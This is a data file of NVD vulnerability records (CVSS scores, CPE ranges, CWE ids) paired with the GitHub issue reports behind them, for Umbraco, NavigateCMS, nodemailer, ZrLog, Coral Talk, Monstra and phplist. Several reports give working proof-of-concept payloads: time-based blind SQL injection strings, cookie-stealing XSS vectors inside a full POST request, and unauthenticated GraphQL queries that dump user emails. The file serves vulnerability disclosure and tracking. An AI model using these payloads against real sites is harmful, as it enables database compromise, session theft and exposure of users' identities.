[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/umbraco/Umbraco-CMS/issues/9782" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/umbraco/Umbraco-CMS/issues/9782" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:umbraco:umbraco_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "2FA93C4D-9FD1-45E4-84D8-6C7B8CA79739", "versionEndExcluding": "7.15.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/umbraco/Umbraco-CMS/issues/9782
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "umbraco", "Umbraco-CMS" ]
### Summary A security report alerted us to an issue where `booting.aspx` could be used as [an open redirect](https://www.netsparker.com/blog/web-security/open-redirection-vulnerability-information-prevention/), which is used for phishing attacks, making it seem that the URL you're clicking is a legitimate site, but you get redirected to a malicious site by that legitimate site. Note that anybody trying to use this vulnerability on your Umbraco site would see the following interstitial page for 10 seconds: ![image](https://user-images.githubusercontent.com/304656/107327803-05420a80-6aae-11eb-9764-1170cf97d00e.png) ### Severity We rate this as a medium level security problem. Although the exploit is available for an unauthenticated attacker, no data can be altered on the target Umbraco site. ### Mitigation Umbraco 7.15.7 mitigates the specific exploit method and we advise you to upgrade to that version. ### Workarounds for older versions Alternatively, for any site with a version lower than 7.15.7 we recommend you remove `booting.aspx`, which will mitigates the problem as well. This file is not often in active use and is therefore safe to remove for most people. Alternatively, if you think your site is often displaying the booting screen, you can update this page, with [the latest version that ships with 7.15.7](https://github.com/umbraco/Umbraco-CMS/blob/b3a00f722460dae6f4b9ba8d8e35f03450925171/src/Umbraco.Web.UI/config/splashes/booting.aspx). **Please note** that your deployment strategy might include a NuGet restore which will restore `booting.aspx` on each deploy, make sure to take steps to prevent this file from being deployed. Similarly, if you do update `booting.aspx` without upgrading to Umbraco 7.15.7, NuGet will overwrite it, so make sure that you only deploy the updated version. ### Credits We'd like to thank Marcin Węgłowski and Mariusz Popławski from [AFINE Team](https://afine.pl) for reporting the issue and validating the fix.
v7: Open redirect security issue - insufficient url sanitization on booting.aspx
https://api.github.com/repos/umbraco/Umbraco-CMS/issues/9782/comments
1
2021-02-09T07:16:26Z
2021-08-04T08:58:19Z
https://github.com/umbraco/Umbraco-CMS/issues/9782
804,284,574
9,782
2,118
CVE-2020-23711
2021-06-28T17:15:07.807
SQL Injection vulnerability in NavigateCMS 2.9 via the URL encoded GET input category in navigate.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/20" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigate_cms:2.9:*:*:*:*:*:*:*", "matchCriteriaId": "5B84FCB0-AA74-4258-B186-491AB6AC304D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/NavigateCMS/Navigate-CMS/issues/20
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
**Expected behaviour** Blind SQL injection (SQLi) enforced to an injection attack wherein an attacker can execute malicious Blind SQL used to collect information via URL encoded GET input **category**. **Impact** Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following attacks successfully: - Reading, updating and deleting arbitrary data or tables from the database. - Executing commands on the underlying operating system. **Steps to reproduce** Inject payload on the **category** via request: http://10.14.140.69:8012/navigate/navigate/navigate.php?_bogus=1592542677572&act=items_order&category==(select(0)from(select(sleep(0)))v)/*%27%2B(select(0)from(select(sleep(0)))v)%2B%27%22%2B(select(0)from(select(sleep(0)))v)%2B%22*/&fid=items Payload: (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ ![image](https://user-images.githubusercontent.com/50371661/85109928-5742d100-b23c-11ea-94a0-eae43babdcc9.png) Payload: (select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/ ![image](https://user-images.githubusercontent.com/50371661/85110084-8e18e700-b23c-11ea-97f4-a511a565af8c.png) Payload: (select(0)from(select(sleep(20)))v)/*'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"*/ ![image](https://user-images.githubusercontent.com/50371661/85110217-bbfe2b80-b23c-11ea-9a85-6a12c155f303.png)
Blind SQL Injection Vulnerability Navigate CMS 2.9
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/20/comments
1
2020-06-19T07:54:57Z
2020-06-19T13:48:21Z
https://github.com/NavigateCMS/Navigate-CMS/issues/20
641,782,357
20
2,119
CVE-2021-23400
2021-06-29T12:15:08.363
The package nodemailer before 6.6.1 are vulnerable to HTTP Header Injection if unsanitized user input that may contain newlines and carriage returns is passed into an address object.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nodemailer/nodemailer/commit/7e02648cc8cd863f5085bad3cd09087bccf84b9f" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nodemailer/nodemailer/issues/1289" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1314737" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-NODEMAILER-1296415" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nodemailer/nodemailer/commit/7e02648cc8cd863f5085bad3cd09087bccf84b9f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nodemailer/nodemailer/issues/1289" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1314737" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-NODEMAILER-1296415" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nodemailer:nodemailer:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "4FBF694C-AC48-438A-9A96-174DB8BB2193", "versionEndExcluding": "6.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/nodemailer/nodemailer/issues/1289
[ "Third Party Advisory" ]
github.com
[ "nodemailer", "nodemailer" ]
Please fill the following questionnaire about your issue: 1. What kind of issue are you reporting? - [x] A bug in Nodemailer - [ ] A bug in a plugin of Nodemailer (eg. issues with nodemailer-sendgrid) - [ ] Feature request - [ ] Looking for help to resolve some kind of problem with Nodemailer 2. Are you listed as a sponsor of Nodemailer project (see Sponsors button above)? - [ ] Yes. Sponsors get priority support - [x] No. Unless it is a bug in Nodemailer you might find support from public forums like [StackOverflow](https://stackoverflow.com/search?q=nodemailer). 3. State your problem here: I've got a pretty standard `sendMail` call here in an HTTP handler: ```javascript await transporter.sendMail({ from: '...', to: '...', replyTo: { name, address, }, subject: 'My Subject', text: message, }); ``` An `address` that contains line-breaks can add arbitrary SMTP headers. In my mind, the reason for using an address object is to avoid having to deal with escaping odd names and addresses (like would be necessary with <code>&#96;${name} <${address}>&#96;</code>); therefore, it is expected that `name` and `address` don't have to be sanitized. Otherwise, it's not just an address object, but an "address plus maybe arbitrary headers," which is not something anyone would _want_ to have. I'm not sure what other fields are vulnerable. This was discovered by @lol768.
Header injection vulnerability in address object
https://api.github.com/repos/nodemailer/nodemailer/issues/1289/comments
1
2021-05-22T22:32:40Z
2021-05-23T10:20:30Z
https://github.com/nodemailer/nodemailer/issues/1289
898,893,487
1,289
2,120
CVE-2020-18066
2021-06-29T18:15:08.520
Cross Site Scripting vulnerability in ZrLog 2.1.0 via the (1) userName and (2) email parameters in post/addComment.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/42" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/42" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zrlog:zrlog:2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9405174E-51EC-48F0-BF91-16021060B7FE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/94fzb/zrlog/issues/42
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "94fzb", "zrlog" ]
hello,Mr.Coder,there is a stored XSS in ther front end which hack can escalate of Privileges. when we access url below: `http://127.0.0.1:8080/zrlog-2.1.0/post/%E8%AE%B0%E5%BD%95` ![image](https://user-images.githubusercontent.com/34211176/50821786-10745a80-136b-11e9-9300-f7ba0f39ac8d.png) we can see there contains a comment modul,it does't check the user input,so when we submit the comment form with the palyoad below,this stored xss will be happened. **payload**:“><img src=I onerror=alert(document.cookie)> **Requested data packet**: ``` POST /zrlog-2.1.0/post/addComment HTTP/1.1 Host: 127.0.0.1:8080 Content-Length: 170 Cache-Control: max-age=0 Origin: http://127.0.0.1:8080 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://127.0.0.1:8080/zrlog-2.1.0/post/%E8%AE%B0%E5%BD%95 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: csrftoken=4YqHpDZtkQJbqwTt9bcAqP6UJjUtUdCEjVY42Q2p337RkWfOoFjxK3rnH2gM75Eb; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1542180522; admin-token=1#4E6D2F687756637630777677385938504D566B41556B6371754353507A4C374C784A74552F7850634C4D52576F496C352B3775616F4935434D56333650656730637646696F6A346A614679593971546B32534839486A32736468494F4D447A39326D3579717156513735453D Connection: close logId=3&userComment=test&web=test&userName=%22%3E%3Cimg+src%3Di+onerror%3Dalert%28document.cookie%29%3E&email=%22%3E%3Cimg+src%3Di+onerror%3Dalert%28document.cookie%29%3E ``` when the cross-site script successful executed,we can see the cookie of the frontend viewr's was been stolen. ![image](https://user-images.githubusercontent.com/34211176/50822033-aad49e00-136b-11e9-9588-b77176a13d63.png) And more seriously,when the admin log in the backend and access the comment manage module,it will cause the cross-site script excute which submit by hacker.And after that,the cookie of the admin will be stolen,and the hacker will use the cookie to escalate of Privileges. ![image](https://user-images.githubusercontent.com/34211176/50822354-85945f80-136c-11e9-90c8-7ecf82435ee3.png) suggestions: 1、Filtered the parameter in the comment form below: logId,userComment,web,userName,email 2、Write a global interceptor to filtered the parameter input from user,And use the entity encode to encode the parameter,to avoid the use of label such as '<' or '>'. Hope you guy fix this flaw quickly,if you have some request,please contact me with the email below: 747289639@qq.com
There is a stored XSS in the frontend which hacker can escalate of Privileges
https://api.github.com/repos/94fzb/zrlog/issues/42/comments
1
2019-01-08T09:46:27Z
2023-04-15T04:37:42Z
https://github.com/94fzb/zrlog/issues/42
396,824,672
42
2,121
CVE-2021-35970
2021-06-30T15:15:10.520
Talk 4 in Coral before 4.12.1 allows remote attackers to discover e-mail addresses and other sensitive information via GraphQL because permission checks use an incorrect data type.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://docs.coralproject.net/coral/api/graphql/#User" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/coralproject/talk/compare/v4.12.0...v4.12.1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/coralproject/talk/issues/3600" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/coralproject/talk/pull/3599" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://docs.coralproject.net/coral/api/graphql/#User" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/coralproject/talk/compare/v4.12.0...v4.12.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/coralproject/talk/issues/3600" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/coralproject/talk/pull/3599" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:voxmedia:coral_talk:*:*:*:*:*:*:*:*", "matchCriteriaId": "E1554947-7AAE-46F7-9905-07D9C67FFA6E", "versionEndExcluding": "4.12.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "697" ]
697
https://github.com/coralproject/talk/issues/3600
[ "Exploit", "Third Party Advisory" ]
github.com
[ "coralproject", "talk" ]
I already contacted some maintainers privately about this, but they did not respond. That's why I'm now making this public. In Talk version 4, it is very easy to query the e-mail addresses of users without any authentication; thus, possibly revealing their true identities behind their pseudonyms. This is possible although the documentation states: > The primary email address of the user. Only accessible to Administrators or the current user. But in order to find out the e-mail address of a user, you can e.g. simply send a `query Q1 { user(id: "XXXX") { email }}` GraphQL-query to the GraphQL-endpoint of the talk-server ­-- without any authentication. You can also query all e-mail addresses with `query Q2 { users(query: {}) { nodes { email }}`. I demand the maintainers (@wyattjoh , @cvle, @kgardnr) to merge [the pull-request](https://github.com/coralproject/talk/pull/3599) as soon as possible, and release version 4.13.0 in the version-4-branch.
Severe Security Issue in Version 4: E-Mail Leak
https://api.github.com/repos/coralproject/talk/issues/3600/comments
2
2021-06-28T08:37:55Z
2021-08-09T22:50:27Z
https://github.com/coralproject/talk/issues/3600
931,320,137
3,600
2,122
CVE-2020-23205
2021-07-01T21:15:07.980
A stored cross site scripting (XSS) vulnerability in Monstra CMS version 3.0.4 allows attackers to execute arbitrary web scripts or HTML via crafted a payload entered into the "Site Name" field under the "Site Settings" module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/465" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/465" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "A2226D9F-8476-4F0F-9DE3-21A8FE290533", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/monstra-cms/monstra/issues/465
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "monstra-cms", "monstra" ]
Hii, Team Monstra!!! **Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Site Settings" feature Monstra. **To Reproduce** Steps to reproduce the behavior: 1.Login into the panel Monstra 2. Go to 'admin/index.php' 3. Click 'System' -> 'Settings' 4. Insert Payload XSS: "><img src=xx onerror=alert(1337)> '><details/open/ontoggle=confirm("XSS")> // # "><svg/onload=prompt(1337)> <svg/on<script><script>load=alert(1337)//</script> 5. Save 6. click View Site -> xss alert message! **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** a. Infor Monstra version: ![info](https://user-images.githubusercontent.com/62001260/82697316-e509bb80-9c92-11ea-9080-fbc7a1ee8189.PNG) b. insert payload xss: ![payload_xss](https://user-images.githubusercontent.com/62001260/82697376-01a5f380-9c93-11ea-9ad8-fd22e7f757b5.PNG) c. view site -> xss alert message ![alert_mess](https://user-images.githubusercontent.com/62001260/82697455-2c904780-9c93-11ea-8820-545d9160b311.PNG) **Desktop (please complete the following information):** OS: Windows Browser: All Version: ---- I Hope you fix it ASAP!!!!
Cross Site Script Vulnerability on "Site Settings" in Monstra version 3.0.4
https://api.github.com/repos/monstra-cms/monstra/issues/465/comments
0
2020-05-22T18:18:39Z
2020-06-10T08:55:46Z
https://github.com/monstra-cms/monstra/issues/465
623,398,488
465
2,123
CVE-2020-23207
2021-07-01T21:15:08.010
A stored cross site scripting (XSS) vulnerability in phplist 3.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Edit Values" field under the "Configure Attributes" module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/664" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/664" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phplist:phplist:3.5.3:*:*:*:*:*:*:*", "matchCriteriaId": "75BC6689-BA8E-46E8-AF78-7AE719F3A17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpList/phplist3/issues/664
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "phpList", "phplist3" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "configure attributes" feature. **To Reproduce** Steps to reproduce the behavior: 1. Login into the panel phplist 2. Go to 'phplist3/lists/admin/?page=attributes&tk=20a8f65277024ee830090611cb93e35d' 3. Click 'Edit Values' -> 'Add new' 4. Insert Payload XSS: '><details/open/ontoggle=confirm(1337)> 5. Add new Woonplaats 6. xss alert message **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **Screenhost** 1. login ![login](https://user-images.githubusercontent.com/62001260/82778023-42139600-9e7a-11ea-9699-d019469872f4.PNG) 2. Add new ![Addnew](https://user-images.githubusercontent.com/62001260/82778039-4f308500-9e7a-11ea-84bc-a5022500b6ee.PNG) 3. Insert payload xss ![insert_payload](https://user-images.githubusercontent.com/62001260/82778045-56f02980-9e7a-11ea-96c2-f850f58c4c32.PNG) 4. xss alert message ![xss_mess](https://user-images.githubusercontent.com/62001260/82778053-5fe0fb00-9e7a-11ea-8b77-b3b1ed415003.PNG) **Desktop (please complete the following information):** OS: Windows Browser: All Version ----- I Hope you fix it ASAP
Cross Site Script Vulnerability on "Configure Attributes" feature in phplist version 3.5.3
https://api.github.com/repos/phpList/phplist3/issues/664/comments
1
2020-05-25T04:25:57Z
2020-05-26T21:09:57Z
https://github.com/phpList/phplist3/issues/664
624,036,031
664
2,124
CVE-2020-23208
2021-07-01T21:15:08.040
A stored cross site scripting (XSS) vulnerability in phplist 3.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Send test" field under the "Start or continue campaign" module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/665" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/665" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phplist:phplist:3.5.3:*:*:*:*:*:*:*", "matchCriteriaId": "75BC6689-BA8E-46E8-AF78-7AE719F3A17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
